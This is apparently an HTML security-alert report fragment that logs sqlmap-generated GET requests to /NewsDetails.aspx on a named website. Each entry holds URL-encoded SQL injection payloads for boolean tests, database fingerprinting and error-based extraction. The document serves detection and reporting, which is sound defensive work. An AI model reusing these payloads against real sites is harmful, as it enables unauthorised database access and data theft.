        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/241-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        241-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/241-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%201888%3D4324&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/279-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        279-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/279-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%201505%3D2418&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/323-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        323-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/323-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%20%28SELECT%20%27psPT%27%20FROM%20RDB%24DATABASE%29%3D%27psPT%27&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/356-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        356-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/356-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%20%28SELECT%20%27VHbm%27%20FROM%20VERSIONS%29%3D%27VHbm%27&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/334-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        334-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/334-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%20%28SELECT%20CHAR%2899%29%7C%7CCHAR%2877%29%7C%7CCHAR%28112%29%7C%7CCHAR%28114%29%20FROM%20INFORMATION_SCHEMA.SYSTEM_USERS%29%3DCHAR%2899%29%7C%7CCHAR%2877%29%7C%7CCHAR%28112%29%7C%7CCHAR%28114%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/369-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        369-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/369-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%20%28SELECT%20CHAR%28119%29%2BCHAR%28112%29%2BCHAR%2889%29%2BCHAR%28122%29%29%3DCHAR%28119%29%2BCHAR%28112%29%2BCHAR%2889%29%2BCHAR%28122%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/302-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        302-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/302-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%20%28SELECT%20CHR%28103%29%26CHR%28117%29%26CHR%2869%29%26CHR%2879%29%20FROM%20MSysAccessObjects%29%3DCHR%28103%29%26CHR%28117%29%26CHR%2869%29%26CHR%2879%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/394-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        394-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/394-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%20%28SELECT%20CHAR%28119%29%2BCHAR%28112%29%2BCHAR%2889%29%2BCHAR%28122%29%29%3DCHAR%2874%29%2BCHAR%2887%29%2BCHAR%28107%29%2BCHAR%2872%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/312-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        312-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/312-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%20%28SELECT%20CHR%2897%29%7C%7CCHR%2872%29%7C%7CCHR%2880%29%7C%7CCHR%28120%29%20FROM%20SYSIBM.SYSDUMMY1%29%3DCHR%2897%29%7C%7CCHR%2872%29%7C%7CCHR%2880%29%7C%7CCHR%28120%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/345-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        345-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/345-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%20%28SELECT%20CHR%2867%29%7C%7CCHR%2877%29%7C%7CCHR%2879%29%7C%7CCHR%28105%29%20FROM%20SYSMASTER%3ASYSDUAL%29%3DCHR%2867%29%7C%7CCHR%2877%29%7C%7CCHR%2879%29%7C%7CCHR%28105%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/456-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        456-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/456-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-5573%20OR%202315%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%282315%3D2315%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/489-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        489-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/489-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=%28CONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%281301%3D1301%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/500-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        500-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/500-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=%28SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%288582%3D8582%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/433-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        433-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/433-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-6602%20OR%205656%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%285656%3D5656%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/467-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        467-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/467-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20AND%209721%3DCONCAT%28CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2C%28SELECT%20%28CASE%20WHEN%20%289721%3D9721%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2CCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%29&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/419-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        419-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
